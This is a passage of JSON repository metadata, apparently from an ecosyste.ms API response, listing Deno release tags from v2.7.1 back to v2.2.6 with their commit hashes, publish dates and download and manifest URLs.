tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","ta